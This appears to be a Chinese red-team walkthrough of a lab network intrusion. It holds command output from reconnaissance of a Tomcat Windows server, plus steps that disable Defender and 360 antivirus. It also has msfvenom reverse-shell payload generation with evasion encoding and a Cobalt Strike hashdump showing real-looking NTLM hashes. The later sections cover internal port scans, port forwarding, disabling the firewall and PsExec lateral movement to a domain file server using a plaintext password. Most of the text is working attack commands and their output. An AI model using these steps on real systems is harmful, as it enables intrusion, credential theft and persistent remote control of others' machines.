00x6-tomcat主机发现
tomcat收集主机信息
网卡信息
ipconfig /all
主机名tomcat-web
两块网卡
路由器信息
arp -a
结果
接口: 10.10.1.129 --- 0x6 Internet 地址 物理地址 类型 10.10.1.1 00-50-56-c0-00-12 动态 10.10.1.255 ff-ff-ff-ff-ff-ff 静态 224.0.0.22 01-00-5e-00-00-16 静态 224.0.0.251 01-00-5e-00-00-fb 静态 224.0.0.252 01-00-5e-00-00-fc 静态 239.255.255.250 01-00-5e-7f-ff-fa 静态 255.255.255.255 ff-ff-ff-ff-ff-ff 静态 接口: 192.168.1.124 --- 0xc Internet 地址 物理地址 类型 192.168.1.1 00-50-56-c0-00-08 动态 192.168.1.130 00-0c-29-90-71-c3 动态 192.168.1.254 00-50-56-fc-85-ce 动态 192.168.1.255 ff-ff-ff-ff-ff-ff 静态 224.0.0.22 01-00-5e-00-00-16 静态 224.0.0.252 01-00-5e-00-00-fc 静态 239.255.255.250 01-00-5e-7f-ff-fa 静态
端口信息
netstat -ano
结果
netstat -ano Connection list =============== Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 796/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:3306 0.0.0.0:* LISTEN 0 0 1920/mysqld.exe tcp 0.0.0.0:5985 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:8009 0.0.0.0:* LISTEN 0 0 5528/java.exe tcp 0.0.0.0:8080 0.0.0.0:* LISTEN 0 0 5528/java.exe tcp 0.0.0.0:47001 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:49664 0.0.0.0:* LISTEN 0 0 516/wininit.exe tcp 0.0.0.0:49665 0.0.0.0:* LISTEN 0 0 968/svchost.exe tcp 0.0.0.0:49666 0.0.0.0:* LISTEN 0 0 928/svchost.exe tcp 0.0.0.0:49668 0.0.0.0:* LISTEN 0 0 1720/spoolsv.exe tcp 0.0.0.0:49669 0.0.0.0:* LISTEN 0 0 648/services.exe tcp 0.0.0.0:49675 0.0.0.0:* LISTEN 0 0 656/lsass.exe tcp 10.10.1.129:139 0.0.0.0:* LISTEN 0 0 4/System tcp 127.0.0.1:3306 127.0.0.1:50617 ESTABLISHED 0 0 1920/mysqld.exe tcp 127.0.0.1:3306 127.0.0.1:53060 ESTABLISHED 0 0 1920/mysqld.exe tcp 127.0.0.1:3306 127.0.0.1:53068 ESTABLISHED 0 0 1920/mysqld.exe tcp 127.0.0.1:3306 127.0.0.1:54388 ESTABLISHED 0 0 1920/mysqld.exe tcp 127.0.0.1:8005 0.0.0.0:* LISTEN 0 0 5528/java.exe tcp 127.0.0.1:49773 127.0.0.1:49774 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49774 127.0.0.1:49773 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49775 127.0.0.1:49776 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49776 127.0.0.1:49775 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49793 127.0.0.1:49794 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49794 127.0.0.1:49793 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49795 127.0.0.1:49796 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49796 127.0.0.1:49795 ESTABLISHED 0 0 5528/java.exe tcp 127.0.0.1:49797 127.0.0.1:49798 ESTABLISHED 0 0 5528/javaexe
tcp 127.0.0.1:49798 127.0.0.1:49797 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:49799 127.0.0.1:49800 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:49800 127.0.0.1:49799 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:50617 127.0.0.1:3306 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:53060 127.0.0.1:3306 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:53068 127.0.0.1:3306 ESTABLISHED 0 0 5528/java.exe
tcp 127.0.0.1:54388 127.0.0.1:3306 ESTABLISHED 0 0 5528/java.exe
tcp 192.168.1.124:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.1.124:8080 192.168.1.1:57761 TIME_WAIT 0 0 0/[System Process]
tcp 192.168.1.124:50999 192.168.1.130:8888 ESTABLISHED 0 0 5528/java.exe
tcp 192.168.1.124:54571 192.168.1.130:8888 ESTABLISHED 0 0 5528/java.exe
tcp 192.168.1.124:57240 192.168.1.130:6068 ESTABLISHED 0 0 7444/B6Ehp013.exe
tcp6 :::135 :::* LISTEN 0 0 796/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::3306 :::* LISTEN 0 0 1920/mysqld.exe
tcp6 :::3389 :::* LISTEN 0 0 9336/svchost.exe
tcp6 :::5985 :::* LISTEN 0 0 4/System
tcp6 :::8009 :::* LISTEN 0 0 5528/java.exe
tcp6 :::8080 :::* LISTEN 0 0 5528/java.exe
tcp6 :::47001 :::* LISTEN 0 0 4/System
tcp6 :::49664 :::* LISTEN 0 0 516/wininit.exe
tcp6 :::49665 :::* LISTEN 0 0 968/svchost.exe
tcp6 :::49666 :::* LISTEN 0 0 928/svchost.exe
tcp6 :::49668 :::* LISTEN 0 0 1720/spoolsv.exe
tcp6 :::49669 :::* LISTEN 0 0 648/services.exe
tcp6 :::49675 :::* LISTEN 0 0 656/lsass.exe
udp 0.0.0.0:3389 0.0.0.0:* 0 0 9336/svchost.exe
udp 0.0.0.0:5050 0.0.0.0:* 0 0 760/svchost.exe
udp 0.0.0.0:5353 0.0.0.0:* 0 0 1092/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 1092/svchost.exe
udp 10.10.1.129:137 0.0.0.0:* 0 0 4/System
udp 10.10.1.129:138 0.0.0.0:* 0 0 4/System
udp 10.10.1.129:1900 0.0.0.0:* 0 0 3816/svchost.exe
udp 10.10.1.129:50902 0.0.0.0:* 0 0 3816/svchost.exe
udp 127.0.0.1:1900 0.0.0.0:* 0 0 3816/svchost.exe
udp 127.0.0.1:50903 0.0.0.0:* 0 0 3816/svchost.exe
udp 192.168.1.124:137 0.0.0.0:* 0 0 4/System
udp 192.168.1.124:138 0.0.0.0:* 0 0 4/System
udp 192.168.1.124:1900 0.0.0.0:* 0 0 3816/svchost.exe
udp 192.168.1.124:50901 0.0.0.0:* 0 0 3816/svchost.exe
udp6 :::3389 :::* 0 0 9336/svchost.exe
udp6 :::5353 :::* 0 0 1092/svchost.exe
udp6 :::5355 :::* 0 0 1092/svchost.exe
udp6 ::1:1900 :::* 0 0 3816/svchost.exe
udp6 ::1:50900 :::* 0 0 3816/svchost.exe
udp6 fe80::1479:3673:41d4:fdd7:1900 :::* 0 0 3816/svchost.exe
udp6 fe80::1479:3673:41d4:fdd7:50899 :::* 0 0 3816/svchost.exe
udp6 fe80::f1f5:a71e:7e7:ee7c:1900 :::* 0 0 3816/svchost.exe
udp6 fe80::f1f5:a71e:7e7:ee7c:50898 :::* 0 0 3816/svchost.exe
主机信息
systeminfo
结果
C:\tomcat\bin>systeminfo systeminfo Host Name: TOMCAT-WEB #计算机名称 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows 用户 Registered Organization: Product ID: 00377-60000-00000-AA810 Original Install Date: 2020/11/3, 23:43:25 System Boot Time: 2022/2/3, 11:34:00 System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz [02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: zh-cn;Chinese (China) Input Locale: zh-cn;Chinese (China) Time Zone: (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi Total Physical Memory: 3,327 MB Available Physical Memory: 337 MB Virtual Memory: Max Size: 8,454 MB Virtual Memory: Available: 1,630 MB Virtual Memory: In Use: 6,824 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP #不在域控里面 Logon Server: \\TOMCAT-WEB Hotfix(s): 2 Hotfix(s) Installed. #程序
补丁 [01]: KB3199986 [02]: KB3200970 Network Card(s): 2 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 192.168.1.124 [02]: fe80::f1f5:a71e:7e7:ee7c [02]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet1 DHCP Enabled: No IP address(es) [01]: 10.10.1.129 [02]: fe80::1479:3673:41d4:fdd7 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. C:\tomcat\bin>
查看开启的服务
net start
结果
C:\tomcat\webapps\ROOT\uploads\1>net start
net start
These Windows services are started:
360 ɱ▒▒ʵʱ▒▒▒▒▒▒ط▒▒▒
Application Information
Background Tasks Infrastructure Service
Base Filtering Engine
CDPUserSvc_11fd67
CNG Key Isolation
COM+ Event System
COM+ System Application
Connected User Experiences and Telemetry
Contact Data_11fd67
CoreMessaging
Credential Manager
Cryptographic Services
DCOM Server Process Launcher
Device Setup Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Geolocation Service
Group Policy Client
IP Helper
IPsec Policy Agent
Local Session Manager
MYSQL56
Network Connection Broker
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Plug and Play
Power
Print Spooler
Program Compatibility Assistant Service
Remote Access Connection Manager
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Secondary Logon
Secure Socket Tunneling Protocol Service
Security Accounts Manager
Server
Shell Hardware Detection
SSDP Discovery
State Repository Service
Storage Service
System Event Notification Service
System Events Broker
Task Scheduler
TCP/IP NetBIOS Helper
Themes
Tile Data model server
Time Broker
User Access Logging Service
User Data Access_11fd67
User Data Storage_11fd67
User Manager
User Profile Service
VMware Alias Manager and Ticket Service
VMware Tools
Windows Connection Manager
Windows Driver Foundation - User-mode Driver Framework
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Management Instrumentation
Windows Remote Management (WS-Management)
Windows ▒▒▒▒֪ͨϵͳ▒▒▒▒
Windows ▒▒▒֤▒▒▒▒▒▒▒▒▒
WinHTTP Web Proxy Auto-Discovery Service
Workstation
▒▒▒▒▒
ͬ▒▒▒▒▒_11fd67
▒▒▒ߵ▒▒▒▒▒▒▒
▒▒▒▒豸ƽ̨▒▒▒▒
The command completed successfully.
C:\tomcat\webapps\ROOT\uploads\1>net user
net user
User accounts for \\TOMCAT-WEB
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
The command completed successfully.
查看进程
tasklist /svc
结果
C:\tomcat\bin>tasklist /svc
tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 352 N/A
csrss.exe 420 N/A
wininit.exe 516 N/A
csrss.exe 524 N/A
winlogon.exe 596 N/A
services.exe 648 N/A
lsass.exe 656 KeyIso, SamSs, VaultSvc
svchost.exe 740 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 796 RpcEptMapper, RpcSs
dwm.exe 876 N/A
svchost.exe 928 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
ProfSvc, RasMan, Schedule, seclogon, SENS,
ShellHWDetection, Themes, UserManager,
Winmgmt, WpnService
svchost.exe 952 NcbService, Netman, PcaSvc, StorSvc,
TrkWks, UALSVC, WdiSystemHost, wudfsvc
svchost.exe 968 Dhcp, EventLog, lmhosts, RmSvc,
TimeBrokerSvc
svchost.exe 76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe 760 CDPSvc, EventSystem, FontCache,
LicenseManager, netprofm, nsi, SstpSvc,
WdiServiceHost, WinHttpAutoProxySvc
svchost.exe 1092 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
360rps.exe 1128 360rp #360杀毒
svchost.exe 1144 Wcmsvc
ZhuDongFangYu.exe 1156 ZhuDongFangYu
spoolsv.exe 1720 Spooler
svchost.exe 1780 DiagTrack
svchost.exe 1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe 1844 VMTools
svchost.exe 1868 LanmanServer
mysqld.exe 1920 MYSQL56
VGAuthService.exe 1932 VGAuthService
MsMpEng.exe 1948 WinDefend
svchost.exe 2248 PolicyAgent
dllhost.exe 2584 COMSysApp
msdtc.exe 2808 MSDTC
WmiPrvSE.exe 3000 N/A
WmiPrvSE.exe 3664 N/A
svchost.exe 3816 SSDPSRV
RuntimeBroker.exe 2340 N/A
sihost.exe 2540 N/A
svchost.exe 3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
PimIndexMaintenanceSvc_11fd67,
UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe 3876 N/A
ChsIME.exe 884 N/A
explorer.exe 3784 N/A
360rp.exe 3808 N/A
360sd.exe 872 N/A
ShellExperienceHost.exe 2576 N/A
SearchUI.exe 2516 N/A
ServerManager.exe 4140 N/A
360Tray.exe 4320 N/A
vm3dservice.exe 4812 N/A
vmtoolsd.exe 4932 N/A
java.exe 5528 N/A
conhost.exe 5588 N/A
SoftMgrLite.exe 5192 N/A
ApplicationFrameHost.exe 4408 N/A
taskhostw.exe 7116 N/A
MySQLInstallerConsole.exe 1672 N/A
conhost.exe 6968 N/A
cmd.exe 7204 N/A
conhost.exe 9440 N/A
SimpleIME.exe 9784 N/A
MpCmdRun.exe 10216 N/A
HelpPane.exe 9312 N/A
360Safe.exe 8888 N/A #360安全
360leakfixer.exe 9612 N/A #360杀毒
SimpleIME.exe 5780 N/A
sublime_text.exe 940 N/A
plugin_host.exe 8972 N/A
dllhost.exe 6728 N/A
MpUXSrv.exe 10052 N/A
MSASCui.exe 8968 N/A
MSASCuiL.exe 10936 N/A
iexplore.exe 10944 N/A
iexplore.exe 10444 N/A
wdswfsafe.exe 10080 N/A #360杀毒-网盾
cmd.exe 10272 N/A
conhost.exe 10548 N/A
cmd.exe 4420 N/A
conhost.exe 3404 N/A
tasklist.exe 10892 N/A
C:\tomcat\bin>
发现的杀软
360sd.exe:360杀毒
360rp.exe:360杀毒
360safe.exe:360安全卫士
360tray.exe:360实时保护
zhudongfangyu.exe:360主动防御
wdswfsafe.exe:360杀毒-网盾
msmpeng.exe:windows defender
mpcmdrun.exe:windows defender
msascui.exe:windows defender
msascuil.exe:windows defender
关闭windows Defeder
上传
执行
DefenderSwitch.exe -off
成功关闭
关闭360安全卫士
上传
执行
进程对比
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 4 K
System 4 Services 0 140 K
smss.exe 352 Services 0 1,196 K
csrss.exe 420 Services 0 4,192 K
wininit.exe 516 Services 0 5,076 K
csrss.exe 524 Console 1 11,632 K
winlogon.exe 596 Console 1 12,484 K
services.exe 648 Services 0 9,784 K
lsass.exe 656 Services 0 15,344 K
svchost.exe 740 Services 0 20,124 K
svchost.exe 796 Services 0 11,760 K
dwm.exe 876 Console 1 145,812 K
svchost.exe 928 Services 0 58,768 K
svchost.exe 952 Services 0 27,092 K
svchost.exe 968 Services 0 27,096 K
svchost.exe 76 Services 0 22,840 K
svchost.exe 760 Services 0 27,728 K
svchost.exe 1092 Services 0 27,396 K
360rps.exe 1128 Services 0 6,684 K
svchost.exe 1144 Services 0 7,268 K
ZhuDongFangYu.exe 1156 Services 0 16,016 K
spoolsv.exe 1720 Services 0 16,436 K
svchost.exe 1780 Services 0 24,400 K
svchost.exe 1832 Services 0 18,844 K
vmtoolsd.exe 1844 Services 0 22,024 K
svchost.exe 1868 Services 0 8,196 K
mysqld.exe 1920 Services 0 38,748 K
VGAuthService.exe 1932 Services 0 10,556 K
svchost.exe 2248 Services 0 7,156 K
dllhost.exe 2584 Services 0 12,760 K
msdtc.exe 2808 Services 0 9,740 K
WmiPrvSE.exe 3000 Services 0 29,508 K
WmiPrvSE.exe 3664 Services 0 19,212 K
svchost.exe 3816 Services 0 7,256 K
RuntimeBroker.exe 2340 Console 1 20,908 K
sihost.exe 2540 Console 1 21,844 K
svchost.exe 3524 Console 1 20,548 K
taskhostw.exe 3876 Console 1 18,620 K
ChsIME.exe 884 Console 1 17,820 K
explorer.exe 3784 Console 1 130,004 K
360rp.exe 3808 Console 1 68,948 K
360sd.exe 872 Console 1 6,644 K
ShellExperienceHost.exe 2576 Console 1 44,308 K
SearchUI.exe 2516 Console 1 19,392 K
ServerManager.exe 4140 Console 1 72,420 K
vm3dservice.exe 4812 Console 1 6,068 K
vmtoolsd.exe 4932 Console 1 45,584 K
java.exe 5528 Console 1 457,948 K
conhost.exe 5588 Console 1 17,828 K
SoftMgrLite.exe 5192 Console 1 22,324 K
ApplicationFrameHost.exe 4408 Console 1 19,440 K
taskhostw.exe 7116 Console 1 18,952 K
MySQLInstallerConsole.exe 1672 Services 0 2,400 K
conhost.exe 6968 Services 0 580 K
cmd.exe 7204 Console 1 2,932 K
conhost.exe 9440 Console 1 18,148 K
SimpleIME.exe 9784 Console 1 12,312 K
HelpPane.exe 9312 Console 1 21,476 K
SimpleIME.exe 5780 Console 1 13,288 K
sublime_text.exe 940 Console 1 39,356 K
plugin_host.exe 8972 Console 1 24,472 K
dllhost.exe 6728 Console 1 8,120 K
MpUXSrv.exe 10052 Console 1 9,348 K
MSASCui.exe 8968 Console 1 30,048 K
MSASCuiL.exe 10936 Console 1 13,592 K
iexplore.exe 10944 Console 1 37,652 K
iexplore.exe 10444 Console 1 50,108 K
wdswfsafe.exe 10080 Console 1 14,900 K
cmd.exe 10744 Console 1 3,232 K
conhost.exe 10580 Console 1 9,652 K
svchost.exe 9028 Services 0 9,004 K
tasklist.exe 9144 Console 1 7,856 K
结果
360sd.exe:360杀毒
360rp.exe:360杀毒
zhudongfangyu.exe:360主动防御
wdswfsafe.exe:360杀毒-网盾
只能关闭360安全卫士不能关闭360杀毒
Tips
只能关闭360安全卫士不能关闭360杀毒
尝试上传msf攻击载荷
生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o payload12.c
免杀生成exe
设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j
执行
成功上线
上传cs攻击载荷
生成攻击payload
免杀生成exe
上传
执行
成功上线
查看进程关闭360杀毒(刚刚只能关闭360安全卫士)
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 352 N/A
csrss.exe 420 N/A
wininit.exe 516 N/A
csrss.exe 524 N/A
winlogon.exe 596 N/A
services.exe 648 N/A
lsass.exe 656 KeyIso, SamSs, VaultSvc
svchost.exe 740 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 796 RpcEptMapper, RpcSs
dwm.exe 876 N/A
svchost.exe 928 Appinfo, CertPropSvc, DsmSvc, gpsvc,
IKEEXT, iphlpsvc, lfsvc, ProfSvc, RasMan,
Schedule, seclogon, SENS, SessionEnv,
ShellHWDetection, Themes, UserManager,
Winmgmt, WpnService
svchost.exe 952 NcbService, Netman, PcaSvc, ScDeviceEnum,
StorSvc, TrkWks, UALSVC, UmRdpService,
wudfsvc
svchost.exe 968 Dhcp, EventLog, lmhosts, RmSvc,
TimeBrokerSvc
svchost.exe 76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe 760 CDPSvc, EventSystem, fdPHost, FontCache,
LicenseManager, netprofm, nsi, SstpSvc,
WdiServiceHost, WinHttpAutoProxySvc
svchost.exe 1092 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 1144 Wcmsvc
spoolsv.exe 1720 Spooler
svchost.exe 1780 DiagTrack
svchost.exe 1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe 1844 VMTools
svchost.exe 1868 LanmanServer
mysqld.exe 1920 MYSQL56
VGAuthService.exe 1932 VGAuthService
svchost.exe 2248 PolicyAgent
dllhost.exe 2584 COMSysApp
msdtc.exe 2808 MSDTC
WmiPrvSE.exe 3000 N/A
WmiPrvSE.exe 3664 N/A
svchost.exe 3816 SSDPSRV
RuntimeBroker.exe 2340 N/A
sihost.exe 2540 N/A
svchost.exe 3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
PimIndexMaintenanceSvc_11fd67,
UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe 3876 N/A
ChsIME.exe 884 N/A
explorer.exe 3784 N/A
ShellExperienceHost.exe 2576 N/A
SearchUI.exe 2516 N/A
ServerManager.exe 4140 N/A
vm3dservice.exe 4812 N/A
vmtoolsd.exe 4932 N/A
java.exe 5528 N/A
conhost.exe 5588 N/A
SoftMgrLite.exe 5192 N/A
ApplicationFrameHost.exe 4408 N/A
taskhostw.exe 7116 N/A
MySQLInstallerConsole.exe 1672 N/A
conhost.exe 6968 N/A
SimpleIME.exe 9784 N/A
HelpPane.exe 9312 N/A
sublime_text.exe 940 N/A
plugin_host.exe 8972 N/A
MpUXSrv.exe 10052 N/A
iexplore.exe 10944 N/A
iexplore.exe 10444 N/A
cmd.exe 7416 N/A
conhost.exe 6760 N/A
FYifCwDC.exe 7024 N/A
explorer.exe 10820 N/A
cmd.exe 4208 N/A
conhost.exe 7220 N/A
cmd.exe 5624 N/A
conhost.exe 3360 N/A
svchost.exe 9336 TermService
cmd.exe 10156 N/A
conhost.exe 3624 N/A
csrss.exe 6092 N/A
winlogon.exe 7056 N/A
LogonUI.exe 7824 N/A
dwm.exe 6396 N/A
rdpclip.exe 10584 N/A
ChsIME.exe 8596 N/A
cmd.exe 10012 N/A
conhost.exe 8360 N/A
SystemSettingsBroker.exe 9836 N/A
cmd.exe 832 N/A
conhost.exe 7436 N/A
cmd.exe 9808 N/A
conhost.exe 5804 N/A
PsExec.exe 8132 N/A
cmd.exe 8532 N/A
conhost.exe 4172 N/A
cmd.exe 10644 N/A
conhost.exe 2072 N/A
tasklist.exe 3428 N/A
对 tomcat-web 详细查看
密码
hashdump
结果
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82553 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
解密
内网探测
portscan 10.10.1.0-10.10.1.254 139 arp 1024
结果
beacon> portscan 10.10.1.0-10.10.1.254 139 arp 1024
[*] Tasked beacon to scan ports 139 on 10.10.1.0-10.10.1.254
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.1' is alive. 00-50-56-C0-00-12
[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
(ARP) Target '10.10.1.129' is alive. 00-0C-29-49-BB-5D
[+] received output:
10.10.1.129:139
10.10.1.1:139
[+] received output:
Scanner module is complete
发现主机10.10.1.128
使用psexec上线其他主机
获取到tomcat机器的密码凭证、也已经探测到10.10.1.128机器的存在、使用CobalStrike的psexec工具进行批量上线内网机器
参考
http://redteam.today/2019/11/22/cobaltstrike%E5%9C%A8%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E4%B8%AD%E7%9A%84%E4%B8%8A%E7%BA%BF%E6%8A%80%E5%B7%A7/
https://blog.csdn.net/weixin_44276628/article/details/104782376
https://github.com/aleenzz/Cobalt_Strike_wiki/blob/master/%E7%AC%AC%E5%8D%81%E4%BA%94%E8%8A%82%5B%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%20%5D.md
上线失败
00x7-发现域内主机
对1.128机器信息搜集
常用端口探测
proxychains4 sudo nmap -sT -Pn 10.10.1.128 -p 80,88,21,139,23,445,3389 --open
只开放了445端口
使用portscan扫描
portscan 10.10.1.128 445 arp
结果
beacon> portscan 10.10.1.128 445 arp
[*] Tasked beacon to scan ports 445 on 10.10.1.128
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
10.10.1.128:445 (platform: 500 version: 10.0 name: FILESERVER domain: FBI)
Scanner module is complete
主机名:FILESERVER
所属域:FBI
使用nmap进行探测
proxychains4 sudo nmap -A -p 445 -O 10.10.1.128
结果
445端口、机器为windows server 2008
尝试访问内网1.128机器
dir \\10.10.1.128\c$
结果
能够访问
开启tomcat主机的3389端口
进行远程访问
查看
尝试连接
失败
直接连接是连接不上的、查看能否访问
做个转发
portfwd add -l 3389 -p 3389 -r 192.168.1.124
将tomcat机器上的3389的流量转发到自己本机的3389端口
登录
rdesktop 127.0.0.1:3389
成功
将所有的防御都关掉、我们前面已经将defeder、360安全卫士关闭了、
小结
00x8-拿下内网域1.128机器会话
前面我们已经获取了1.124-tomcat机器的cs与msf的会话、同时还获取了tomcat机器的3389远程访问的权限、对于1.128内网file server机器只是开启了一个445的端口、这里我们采用的是进行反向连接的方法
MSF反向连接
先生成连接10.10.1.129的msf攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.129 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o 128to129.c
生成免杀exe
上传
复制到10.10.1.128的fileserver的机器上
copy 128to129.exe \\10.10.1.128\c$
查看
流量转发
将129机器上的6068端口转发到攻击机器192.168.1.130的6068端口
netsh interface portproxy add v4tov4 listenport=6068 connectport=6068 connectaddress=192.168.1.130
查看转发情况
netsh interface portproxy show all
Tips
如果上面的转发后、依旧是没有上面的规则、说明是防火墙没有关闭
禁用系统防火墙
netsh firewall set opmode disable
启用防火墙
netsh firewall set opmode enable
攻击机做监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j
运行
在10.10.1.128-fileserver机器上运行攻击载荷
在namp上我们查看到的OA版本是Windows server 2008、at命令就无法使用了
上面我们在CobalStrike尝试使用psexec进行上线内网主机发现是失败的、但是这种方法是可以的、应该是目标机器不出网的原因、使用工具进行上线。
参考
https://www.ajsafe.com/news/25.html
使用工具
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
下载
上传工具
再次运行
PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129.exe
这个最好是在远控上执行、因为第一次使用psexec.exe会有一个agree的弹窗需要确认
在终端session上无法执行
msf成功上线
信息
00x9-域内信息搜集
杀软扫描
tasklist /svc
结果
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 316 N/A
csrss.exe 384 N/A
wininit.exe 480 N/A
csrss.exe 488 N/A
winlogon.exe 556 N/A
services.exe 604 N/A
lsass.exe 612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe 700 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 760 RpcEptMapper, RpcSs
dwm.exe 844 N/A
svchost.exe 908 NcbService, Netman, PcaSvc, StorSvc,
TrkWks, UALSVC, wudfsvc
svchost.exe 916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe 924 CDPSvc, EventSystem, FontCache,
LicenseManager, netprofm, nsi, W32Time,
WinHttpAutoProxySvc
svchost.exe 1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe 1020 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
ProfSvc, Schedule, SENS, ShellHWDetection,
Themes, UserManager, Winmgmt, wlidsvc,
WpnService
svchost.exe 1204 Wcmsvc
spoolsv.exe 1628 Spooler
svchost.exe 1672 DiagTrack
vmtoolsd.exe 1712 VMTools
svchost.exe 1772 StateRepository, tiledatamodelsvc
svchost.exe 1784 LanmanServer
VGAuthService.exe 1792 VGAuthService
MsMpEng.exe 1824 WinDefend
dllhost.exe 2244 COMSysApp
msdtc.exe 2364 MSDTC
WmiPrvSE.exe 2956 N/A
RuntimeBroker.exe 3980 N/A
sihost.exe 1624 N/A
svchost.exe 1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe 2464 N/A
ChsIME.exe 396 N/A
explorer.exe 3872 N/A
ShellExperienceHost.exe 3344 N/A
SearchUI.exe 1392 N/A
vm3dservice.exe 3512 N/A
vmtoolsd.exe 3656 N/A
ApplicationFrameHost.exe 2176 N/A
LogonUI.exe 624 N/A
ChsIME.exe 5056 N/A
LockAppHost.exe 4932 N/A
LockApp.exe 1348 N/A
csrss.exe 2432 N/A
winlogon.exe 1812 N/A
dwm.exe 1960 N/A
ChsIME.exe 1228 N/A
RuntimeBroker.exe 4872 N/A
sihost.exe 3372 N/A
svchost.exe 1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe 4412 N/A
explorer.exe 3100 N/A
ChsIME.exe 576 N/A
ShellExperienceHost.exe 5000 N/A
ServerManager.exe 3844 N/A
SearchUI.exe 5052 N/A
vm3dservice.exe 308 N/A
cmd.exe 380 N/A
conhost.exe 2584 N/A
MpCmdRun.exe 3328 N/A
